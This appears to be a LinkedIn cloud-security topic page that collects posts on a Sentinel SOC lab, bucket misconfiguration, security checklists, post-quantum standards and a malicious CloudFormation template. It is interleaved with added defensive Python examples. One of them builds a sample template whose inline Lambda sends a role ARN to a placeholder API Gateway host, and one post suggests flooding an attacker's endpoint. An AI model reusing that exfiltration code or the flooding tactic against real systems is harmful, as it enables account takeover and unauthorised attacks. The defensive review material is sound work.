Cloud Security


  • View profile for Shounak Das

    GreyMatter Specialist at ReliaQuest | Security Engineering, Incident Response, Detection Optimization | Splunk, Google SecOps, QRadar, Crowdstrike, Sentinel, Exabeam

    2,152 followers

    I recently built a cloud-based SOC lab at home using Microsoft Azure and Sentinel. The goal was to simulate a real-world environment to monitor brute-force attacks in real time. I deployed a Windows VM, deliberately exposed it to the internet, and configured Sentinel to ingest and analyze security events. Using KQL (Kusto Query Language), I filtered failed login attempts and linked source IPs to geolocation data via a watchlist. The result: a live, map-based visualization of attack sources from around the world. This was a hands-on way to better understand log analytics, threat detection, and how SIEM tools operate in practice. 🔗 https://lnkd.in/gGjGzpad Inspired by Josh Madakor's tutorial 👏 #Azure #MicrosoftSentinel #SOC #SIEM #KQL #Cybersecurity
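The filter-and-join logic the post describes (failed logons summarized by source IP, then joined to a geolocation watchlist) as an added Python example that runs offline. This is not the post's KQL and not the tutorial's code: the event rows, the watchlist rows and the watchlist alias `geoip` named in the docstrings are constructed for the example, and the row shape mimics Sentinel's SecurityEvent table.

```python
import ipaddress
from collections import Counter

# Constructed sample rows, shaped like Sentinel's SecurityEvent table
# (EventID 4625 = "An account failed to log on"). Not real telemetry; the
# addresses come from the RFC 5737 documentation ranges.
SAMPLE_EVENTS = [
    {"EventID": 4625, "Account": "administrator", "IpAddress": "203.0.113.10"},
    {"EventID": 4625, "Account": "admin",         "IpAddress": "203.0.113.10"},
    {"EventID": 4625, "Account": "root",          "IpAddress": "203.0.113.10"},
    {"EventID": 4625, "Account": "guest",         "IpAddress": "203.0.113.10"},
    {"EventID": 4625, "Account": "administrator", "IpAddress": "198.51.100.7"},
    {"EventID": 4625, "Account": "sqladmin",      "IpAddress": "198.51.100.7"},
    {"EventID": 4625, "Account": "administrator", "IpAddress": "192.0.2.55"},
    {"EventID": 4624, "Account": "labuser",       "IpAddress": "203.0.113.10"},  # success, ignored
    {"EventID": 4625, "Account": "labuser",       "IpAddress": "-"},             # no source IP, ignored
]

# Constructed watchlist rows (a Sentinel watchlist is an uploaded CSV); the
# countries and coordinates are made up for the example.
GEO_WATCHLIST = [
    {"network": "203.0.113.0/24",  "country": "Examplia", "latitude": 10.0,  "longitude": 20.0},
    {"network": "198.51.100.0/24", "country": "Testonia", "latitude": -30.0, "longitude": 40.0},
]


def failed_logons_by_ip(events, threshold=2):
    """Equivalent of
         SecurityEvent | where EventID == 4625 | summarize FailedLogons = count() by IpAddress
    keeping only sources with at least `threshold` failures and dropping rows whose
    IpAddress is not an address ("-" is what a local logon attempt carries)."""
    counts = Counter()
    for ev in events:
        if ev.get("EventID") != 4625:
            continue
        try:
            ip = str(ipaddress.ip_address(ev.get("IpAddress", "")))
        except ValueError:
            continue
        counts[ip] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def enrich_with_geo(counts, watchlist):
    """Equivalent of joining the summarized table to _GetWatchlist('geoip') (assumed alias)
    with the ipv4_lookup plugin: longest-prefix match of each source IP into the watchlist
    networks. Sources that match nothing stay in the output marked "unknown", so an
    attacker from an unlisted range still shows up in the dashboard instead of vanishing."""
    networks = [(ipaddress.ip_network(row["network"]), row) for row in watchlist]
    rows = []
    for ip, n in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0])):
        addr = ipaddress.ip_address(ip)
        hits = [(net, row) for net, row in networks if addr in net]
        row = max(hits, key=lambda h: h[0].prefixlen)[1] if hits else None
        rows.append({
            "IpAddress": ip,
            "FailedLogons": n,
            "country": row["country"] if row else "unknown",
            "latitude": row["latitude"] if row else None,
            "longitude": row["longitude"] if row else None,
        })
    return rows


if __name__ == "__main__":
    for r in enrich_with_geo(failed_logons_by_ip(SAMPLE_EVENTS, threshold=1), GEO_WATCHLIST):
        print(f'{r["IpAddress"]:<15} {r["FailedLogons"]:>3}  {r["country"]:<10} {r["latitude"]}, {r["longitude"]}')
```

The two design points worth carrying back into the KQL: drop rows whose IpAddress is not parseable before summarizing (local logon failures otherwise pile up under "-"), and use an outer-style lookup so sources missing from the watchlist are still listed rather than silently dropped from the map.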

  • View profile for Yew Jin Kang

    Banking Chief Technology Officer | IDG/Foundry CIO100 | Solution Architect | Cloud | Artificial Intelligence Enthusiast | Comics Collector | Toy Photography

    12,048 followers

    This EY incident underscores a truth we often overlook: the most common cloud vulnerability isn't a zero-day exploit; it's a configuration oversight. A single misstep in cloud storage permissions turned a database backup into a public-facing risk. These files often hold the "keys to the kingdom", i.e. credentials, API keys, and tokens that can lead to a much wider breach. How do we protect ourselves against these costly mistakes?

    Suggestions
    1. Continuous Monitoring: Implement a CSPM for 24/7 configuration scanning. CSPM is Cloud Security Posture Management -> a type of automated security tool that continuously monitors cloud environments for misconfigurations, vulnerabilities, and compliance violations. It provides visibility, threat detection, and remediation workflows across multi-cloud and hybrid cloud setups, including SaaS, PaaS, and IaaS services.
    2. Least Privilege Access: Default to private. Grant access sparingly.
    3. Data Encryption: For data at rest and in transit.
    4. Automated Alerts: The moment something becomes public, you should know.
    5. Regular Audits: Regularly review access controls and rotate secrets.
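What suggestions 2 and 4 above look like as code: an added Python example (not from the post, and not any vendor's CSPM logic) that evaluates whether a storage bucket's resource policy or ACL makes it reachable by anyone, using S3-style documents. The policies and ACLs are constructed for the example; the account ID 123456789012 and org ID o-exampleorgid are the placeholder values AWS uses in its own documentation, and the bucket name is made up.

```python
# Constructed example: the kind of policy that turns a backup bucket public.
LEAKY_BACKUP_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-db-backups", "arn:aws:s3:::example-db-backups/*"],
    }],
}

# Constructed example of "default to private": a named role, a wildcard principal that is
# narrowed to one organization, and a Deny that only removes access (never grants it).
PRIVATE_BACKUP_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "BackupRoleOnly", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/backup-restore"},
         "Action": ["s3:GetObject", "s3:PutObject"], "Resource": "arn:aws:s3:::example-db-backups/*"},
        {"Sid": "OrgReadOnly", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-db-backups/*",
         "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-exampleorgid"}}},
        {"Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*", "Action": "s3:*",
         "Resource": ["arn:aws:s3:::example-db-backups", "arn:aws:s3:::example-db-backups/*"],
         "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
    ],
}

LEAKY_ACL = {"Owner": {"ID": "owner-canonical-id"}, "Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
]}
PRIVATE_ACL = {"Owner": {"ID": "owner-canonical-id"}, "Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
]}

# Condition keys that narrow "Principal": "*" to a known set of callers. This check looks
# at keys only: aws:SourceIp = 0.0.0.0/0 would still be public, so a production check
# must also inspect the values.
RESTRICTING_CONDITION_KEYS = {
    "aws:principalorgid", "aws:principalaccount", "aws:principalarn",
    "aws:sourcevpce", "aws:sourcevpc", "aws:sourceip", "aws:sourcearn", "aws:sourceaccount",
}

PUBLIC_ACL_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",  # any AWS customer, not "your users"
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _anonymous_principal(principal):
    """True for the forms that mean 'anyone': "*" or {"AWS": "*"} (possibly inside a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any("*" in _as_list(v) for v in principal.values())
    return False


def public_policy_findings(policy):
    """Allow statements reachable by an anonymous principal with no narrowing condition."""
    findings = []
    for i, st in enumerate(_as_list(policy.get("Statement", []))):
        if st.get("Effect") != "Allow" or not _anonymous_principal(st.get("Principal")):
            continue
        keys = {k.lower() for block in st.get("Condition", {}).values() for k in block}
        if keys & RESTRICTING_CONDITION_KEYS:
            continue
        findings.append({"statement": i, "sid": st.get("Sid"),
                         "actions": _as_list(st.get("Action", [])),
                         "resources": _as_list(st.get("Resource", []))})
    return findings


def public_acl_findings(acl):
    """ACL grants to the AllUsers / AuthenticatedUsers groups."""
    return [{"grantee": g["Grantee"]["URI"], "permission": g["Permission"]}
            for g in acl.get("Grants", [])
            if g["Grantee"].get("Type") == "Group" and g["Grantee"].get("URI") in PUBLIC_ACL_GRANTEES]


def is_public(policy=None, acl=None):
    """The predicate an 'alert the moment something becomes public' rule would evaluate."""
    return bool(public_policy_findings(policy or {}) or public_acl_findings(acl or {}))
```

Two caveats a practitioner would add: a bucket is public if either the policy or the ACL opens it, so both must be checked (and in AWS the account-level block-public-access setting should make both findings impossible in the first place), and `AuthenticatedUsers` is a public group despite its name.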

  • View profile for Sean Connelly🦉

    Architect of U.S. Federal Zero Trust | Co-author NIST SP 800-207 & CISA Zero Trust Maturity Model | Former CISA Zero Trust Initiative Director | Advising Governments & Enterprises

    22,643 followers

    🚨CISA & NSA release Crucial Guide on Network Segmentation and Encryption in Cloud Environments🚨

    In response to the evolving requirements of cloud security, the Cybersecurity & Infrastructure Security Agency (CISA) and the National Security Agency (NSA) recently released a comprehensive Cybersecurity Information Sheet (CSI): "Implement Network Segmentation and Encryption in Cloud Environments." This document provides detailed recommendations to enhance the security posture of organizations operating within cloud infrastructures (that probably means you).

    Key Takeaways Include:
    🔐 Network Encryption: The document underscores the importance of encrypting data in transit as a defense mechanism against unauthorized data access.
    🌐 Secure Client Connections: Establishing secure connections to cloud services is fundamental.
    🔎 Caution on Traffic Mirroring: While recognizing the benefits of traffic mirroring for network analysis and threat detection, the guidance cautions against potential misuse that could lead to data exfiltration and advises careful monitoring of this feature.
    🛡️ Network Segmentation: Stressed as a foundational security principle, network segmentation is recommended to isolate and contain malicious activities, thereby reducing the impact of any breach.

    This collaboration between NSA and CISA provides actionable recommendations for organizations to strengthen their cloud security practices. The emphasis is on strategically implementing network segmentation and end-to-end encryption to secure cloud environments effectively. Information security leaders are encouraged to review this guidance to better understand the measures necessary to protect cloud-based assets. Implementing these recommendations will contribute to a more secure, resilient, and compliant cloud infrastructure. Access the complete guidance provided by the NSA and CISA to fully understand these recommendations and their application to your organization’s cloud security strategy.

    📚 Read CISA & NSA's complete guidance here: https://lnkd.in/eeVXqMSv #cloudcomputing #technology #informationsecurity #innovation #cybersecurity

  • View profile for saed ‎

    Senior Security Engineer at Google, Kubestronaut🏆 | Opinions are my very own

    78,191 followers

    If you’re new to Security Engineering, you’re likely:
    – relying on “default” cloud configs
    – skipping threat modeling and risk reviews
    – ignoring logging, audit trails, or alert fatigue
    – underestimating insider threats and privilege creep
    – forgetting to patch dependencies and container images

    Follow this simple 27-rule Security Engineering Checklist to protect your org and avoid rookie mistakes.
    1. Never deploy to prod without a full security review and automated vulnerability scan.
    2. Patch everything, OS, dependencies, containers, on a regular schedule, not just when an incident hits.
    3. Rotate all secrets and keys regularly, and store them in a dedicated secrets manager.
    4. Enforce strong, unique passwords everywhere. Disable password reuse.
    5. Require Multi-Factor Authentication (MFA) for all privileged and production accounts.
    6. Limit permissions by default: start with zero trust, use least privilege everywhere.
    7. Set up Role-Based Access Control (RBAC) and review roles/permissions every quarter.
    8. Segment networks, no flat internal networks. Isolate prod, staging, and dev completely.
    9. Encrypt data everywhere: at rest, in transit, and (where possible) in use.
    10. Enable detailed audit logging on all critical systems, APIs, and cloud resources.
    11. Review audit logs regularly, don’t just store them, analyse for anomalies.
    12. Use Infrastructure as Code (IaC) to standardise, version, and review every config change.
    13. Scan all Infrastructure as Code and container images for security misconfigurations and vulnerabilities.
    14. Run regular external and internal penetration tests, don’t trust just compliance scans.
    15. Threat model every major new system or feature before shipping to production.
    16. Validate and sanitise all user inputs, never trust client-side validation alone.
    17. Protect public endpoints with WAFs, API gateways, and rate limiters.
    18. Require code reviews for all security-sensitive code paths.
    19. Never expose internal services directly to the internet, use proxies, firewalls, and allowlists.
    20. Monitor for unusual authentication, privilege escalations, and lateral movement.
    21. Use endpoint protection and EDR (Endpoint Detection & Response) on all corporate devices.
    22. Run simulated phishing campaigns and red team exercises, not just annual security training.
    23. Automate alerting for critical events, disable noisy, low-signal alerts to avoid alert fatigue.
    24. Enforce secure backups, encrypt, store offsite, and regularly test restore.
    25. Require explicit approval and justification for opening firewall ports or changing access.
    26. Document every system’s security controls, incident history, and responsible owner.
    27. Never treat security as “done”, review, improve, and iterate after every incident and audit.

    ---
    Found this useful? Repost it. Follow saed ‎for more & subscribe to the newsletter: https://lnkd.in/eD7hgbnk I am now on Instagram: instagram.com/saedctl say hello 👋

  • View profile for Danny Steenman

    Helping startups build faster on AWS while controlling costs, security, and compliance | Founder @ Towards the Cloud

    11,399 followers

    I've set up hundreds of AWS accounts for clients over the years. Here's your essential checklist when starting a new AWS account:
    1. Delete default VPC, create a custom one
    2. Set up budget alerts
    3. Enable CloudTrail logs
    4. Configure strong password policy
    5. Enforce MFA for all users
    6. Enable AWS Resource Explorer
    7. Set up IAM roles and least privilege access
    8. Enable AWS Security Hub for centralized security management
    9. Implement tagging strategy for cost allocation
    10. Enable AWS Organizations for multi-account strategy

    These steps establish a robust foundation for security, cost management, compliance, and scalability. Pro tip: Automate this process with Infrastructure as Code (IaC) tools like AWS CloudFormation, AWS CDK or Terraform. It ensures consistency and saves time on future setups. Which of these do you prioritize? Any crucial steps I missed? Share your thoughts!

  • View profile for Victor GRENU

    AWS Consultant, Founder.

    4,785 followers

    A few months ago, we found a malicious AWS CloudFormation template trying to breach a customer's AWS account. It was disguised as “AWS Support for Fargate”. Here’s what it’s really up to:
    1. Grants itself administrator-level permissions via a fake support IAM role
    2. Deploys a Lambda function (in-line) to exfiltrate the role ARN to an external API Gateway endpoint
    3. Invokes itself using an AWS CloudFormation CustomResource

    📘 Blue team tips
    - Always review the IAM roles, policies, and external calls in any template.
    - Use the IAM Access Analyzer to verify external trust relationships.
    - Don’t blindly trust anything labeled “AWS Support” — verify it first!
    - Report to AWS Security teams ASAP.

    📕 Red team tips
    - The malicious actor is identified by the AWS account ID in the AssumeRole policy.
    - Consider flooding the API endpoint with randomly generated payloads using fake IAM role ARNs.
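The first blue-team tip above (review the IAM roles, policies and external calls in any template before deploying it) as an added Python example. This is not the author's code and the template below is constructed to match the three-step pattern the post describes, not the real template from the incident: 111111111111 stands in for the attacker-controlled account, 123456789012 is the AWS documentation placeholder for the deploying account, and the execute-api hostname is made up.

```python
import re

# Account the template is supposed to be deployed into (placeholder from AWS docs).
DEPLOYING_ACCOUNT = "123456789012"
ADMIN_POLICY_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"

# Constructed template in CloudFormation's JSON form: a role trusted by a foreign account
# and given admin rights, inline Lambda code that posts the role ARN to an API Gateway
# endpoint, and a custom resource that runs that code during stack creation.
SUSPICIOUS_TEMPLATE = {
    "AWSTemplateFormatVersion": "2010-09-09",
    "Description": "AWS Support for Fargate",
    "Resources": {
        "SupportRole": {
            "Type": "AWS::IAM::Role",
            "Properties": {
                "AssumeRolePolicyDocument": {"Version": "2012-10-17", "Statement": [
                    {"Effect": "Allow", "Principal": {"Service": "lambda.amazonaws.com"}, "Action": "sts:AssumeRole"},
                    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::111111111111:root"}, "Action": "sts:AssumeRole"},
                ]},
                "ManagedPolicyArns": [ADMIN_POLICY_ARN],
            },
        },
        "ReportFunction": {
            "Type": "AWS::Lambda::Function",
            "Properties": {
                "Runtime": "python3.12", "Handler": "index.handler",
                "Role": {"Fn::GetAtt": ["SupportRole", "Arn"]},
                "Code": {"ZipFile": (
                    "import urllib.request\n"
                    "def handler(event, context):\n"
                    "    arn = event['ResourceProperties']['RoleArn']\n"
                    "    urllib.request.urlopen('https://abc123.execute-api.us-east-1.amazonaws.com/prod/collect?arn=' + arn)\n"
                )},
            },
        },
        "Trigger": {
            "Type": "Custom::SupportSetup",
            "Properties": {"ServiceToken": {"Fn::GetAtt": ["ReportFunction", "Arn"]},
                           "RoleArn": {"Fn::GetAtt": ["SupportRole", "Arn"]}},
        },
        "LogBucket": {"Type": "AWS::S3::Bucket", "Properties": {}},
    },
}


def _as_list(v):
    return v if isinstance(v, list) else [v]


def _principal_accounts(principal):
    """Account IDs (or "*") named in a trust-policy principal; service principals yield nothing."""
    if principal == "*":
        return {"*"}
    found = set()
    if isinstance(principal, dict):
        for entry in _as_list(principal.get("AWS", [])):
            if entry == "*":
                found.add("*")
            elif isinstance(entry, str):
                m = re.search(r"\b(\d{12})\b", entry)
                if m:
                    found.add(m.group(1))
    return found


def _grants_admin(props):
    if ADMIN_POLICY_ARN in props.get("ManagedPolicyArns", []):
        return True
    for pol in props.get("Policies", []):
        for st in _as_list(pol.get("PolicyDocument", {}).get("Statement", [])):
            if st.get("Effect") == "Allow" and "*" in _as_list(st.get("Action")) \
                    and "*" in _as_list(st.get("Resource")):
                return True
    return False


def review_template(template, deploying_account=DEPLOYING_ACCOUNT):
    """Findings a reviewer wants before deploying: trust to other accounts, admin-level
    permissions, outbound URLs in inline Lambda code, and custom resources (which execute
    that code at stack-creation time). Only string ZipFile bodies are inspected; code built
    with Fn::Join or shipped as an S3 artifact has to be fetched and read separately."""
    findings = []
    for name, res in template.get("Resources", {}).items():
        rtype, props = res.get("Type", ""), res.get("Properties", {})
        if rtype == "AWS::IAM::Role":
            for st in _as_list(props.get("AssumeRolePolicyDocument", {}).get("Statement", [])):
                for acct in _principal_accounts(st.get("Principal")):
                    if acct != deploying_account:
                        findings.append({"resource": name, "kind": "external-trust", "detail": acct})
            if _grants_admin(props):
                findings.append({"resource": name, "kind": "admin-permissions",
                                 "detail": "AdministratorAccess or Action:* on Resource:*"})
        elif rtype == "AWS::Lambda::Function":
            code = props.get("Code", {}).get("ZipFile", "")
            hosts = set(re.findall(r"https?://([A-Za-z0-9.-]+)", code)) if isinstance(code, str) else set()
            for host in sorted(hosts):
                findings.append({"resource": name, "kind": "outbound-call", "detail": host})
        elif rtype == "AWS::CloudFormation::CustomResource" or rtype.startswith("Custom::"):
            findings.append({"resource": name, "kind": "custom-resource",
                             "detail": str(props.get("ServiceToken"))})
    return findings


if __name__ == "__main__":
    for f in review_template(SUSPICIOUS_TEMPLATE):
        print(f'{f["resource"]:<15} {f["kind"]:<18} {f["detail"]}')
```

Note why the outbound-call check reports every host rather than allowlisting `*.amazonaws.com`: an API Gateway endpoint lives under amazonaws.com too, so a domain allowlist would wave through exactly the exfiltration channel the post describes. The combination that matters is the three findings together: a foreign trust plus admin rights plus code that runs at deploy time.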

  • View profile for Artem Polynko

    Cloud Security & AI Compliance | 23x Certified | CISSP & CCSP Associate | Securing the Latest Innovations | Helping You Navigate Cybersecurity

    32,980 followers

    Planning to get into Cloud Security? Here are the most commonly used services: Cloud security services may look different in AWS, Azure, and GCP at first glance. But the core security functions are almost identical. This visual breaks down the cloud security services teams use daily across all three major cloud providers. Let’s dive in 👇

    🔐 Identity and access control → Every cloud starts with identity. AWS IAM, Azure Entra ID, and GCP IAM control who can access what, enforce least privilege, and investigate access issues. Most cloud breaches start with identity misconfigurations, not exploits.
    📊 Logging and visibility → CloudTrail, Azure Monitor, and Cloud Logging record everything that happens in your environment. These services are the backbone of investigations, audits, and incident response. No logs means no proof and no visibility.
    🚨 Threat detection and posture management → GuardDuty, Defender for Cloud, and Security Command Center detect suspicious behavior, misconfigurations, and risky patterns. They help teams move from reactive security to continuous monitoring.
    🌐 Network protection and segmentation → Security Groups, NSGs, VPC Firewall Rules, WAFs, and Cloud Armor control traffic and block attacks before they reach workloads. This is how cloud teams reduce blast radius and prevent lateral movement.
    🔒 Encryption and key management → KMS, Key Vault, and Cloud KMS protect sensitive data at rest and in transit. Encryption is useless without proper key control, rotation, and access restrictions.
    🧩 Centralized security visibility → Security Hub and Secure Score aggregate findings across services and accounts. This is how teams track posture, prioritize fixes, and prove compliance at scale.

    📚 Final Thoughts: Different cloud names, same security goals. If you understand these core services, you can transfer cloud security skills across AWS, Azure, and GCP with confidence.
    🔁 Share with someone learning cloud security!
    💾 Save or screenshot this so you don’t forget. #CloudSecurity #AWSSecurity #AzureSecurity #GCPSecurity #CyberSecurity

  • View profile for Thai Duong

    Chief at Calif | We're hiring calif.io/jobs

    11,327 followers

    You've probably seen the news: Oracle Cloud got popped, exposing 6 million records from over 140,000 tenants. The breach came to light after user "rose87168" dropped the loot on Breach Forums. The alleged attacker disclosed to Bleeping Computer that they used a known vulnerability to hit Oracle Cloud's SSO endpoint at login.<region>.oracle.com. Chances are, it was either CVE-2021-35587 or CVE-2022-21445. Both issues were discovered and reported by our very own Đức Nguyễn, together with Jang Nguyen, who's also joined our red team on many fun adventures. Duc found the bugs before he even joined the team. As Duc explained in his blog (link in comments), these are monster bugs, affecting a wide swath of Oracle products and companies. During their research, Jang and Duc even managed to pwn multiple systems under oracle.com, including the SSO endpoint at login.oracle.com (see the picture below). In 2023, we used the same vuln to compromise an Oracle BI instance buried deep inside a bank during a beautiful money heist simulation. Oracle products are notoriously complex, and Oracle is not exactly famous for fast patching. It took them more than six months to fix CVE-2021-35587 and CVE-2022-21445. Some deprecated product lines never got patches at all. As a result, many Oracle systems are left outdated and vulnerable. At this point, if you're running Oracle, it's probably safer to assume you're already breached, and plan your defense accordingly.

  • View profile for Marcel Warchaftig

    Mastering digital sovereignty: Your data, your rules! | Sales Lead New Business Western Europe at Nextcloud | 🤝

    4,497 followers

    What a surprise for the EU 😱 😉 A recently published expert opinion commissioned by the German Federal Ministry of the Interior has sparked a pivotal discussion on data governance and sovereignty. According to the report, US authorities can exert far-reaching access rights to cloud data managed by US-based companies, even when that data is stored in European data centers and administered through local subsidiaries. This is because legal instruments such as the Stored Communications Act, extended by the CLOUD Act, and Section 702 of FISA focus on the provider’s control, not the physical location of the servers. This finding is a firm reminder that simply hosting data on European soil does not guarantee protection from extraterritorial legal claims. It reveals structural risks in relying on dominant foreign cloud providers for sensitive data and critical digital infrastructure. For Europe to truly uphold its data protection principles and strategic autonomy, the conversation must go beyond compliance checklists and contractual assurances. We need stronger investment in #opensource digital infrastructure and indigenous technologies that reduce dependency on non-European platforms. Open source fosters transparency and auditability while enabling communities and businesses to build on systems that are not bound by foreign legal systems. If #digitalsovereignty is to mean more than a buzzword, we must accelerate our efforts towards resilient, interoperable, and locally governed alternatives. Only then can Europe ensure that its data is governed by the laws and values that its citizens and organisations expect. Source: https://lnkd.in/dtpXiwYN

  • View profile for Vaughan Shanks

    Helping security teams respond to cyber incidents better and faster | CEO & Co-Founder, Cydarm Technologies

    12,075 followers

    Last week #NIST released three post-#quantum #encryption standards. Why is this significant? Put simply, from a practical standpoint: risk management and compliance.

    First, on risk management: experts now say that quantum computing is less than a decade away. Quantum computers are expected to have the power to search large keyspaces very quickly, which means they will be able to decrypt current encryption. Moreover, it is entirely plausible that encrypted information recorded today is being stored for decryption when quantum computing becomes available. If you speculatively apply quantum-resistant encryption to your data now, you will reduce the risk of an adversary being able to successfully exploit your data when they have access to quantum computing.

    Second, on compliance: NIST is the governing body for standards in the USA, and many other nations take their encryption standards from NIST, as they do not have resources at the same scale as NIST. You can be certain that NIST-approved post-quantum algorithms will start being mentioned in various compliance checklists, as is the case currently with algorithms such as AES-256 and SHA-256. Note well that these algorithms have #FIPS numbers associated with them - meaning "Federal Information Processing Standard".

    Briefly, the approved algorithms are:
    🔒 ML-KEM, for encrypted key exchange, as FIPS 203
    🔒 ML-DSA, for digital signatures, as FIPS 204
    🔒 SLH-DSA, for stateless hash-based digital signatures, as FIPS 205
    There is a fourth algorithm, FN-DSA, also used for digital signatures, that is expected to be released in the next year.
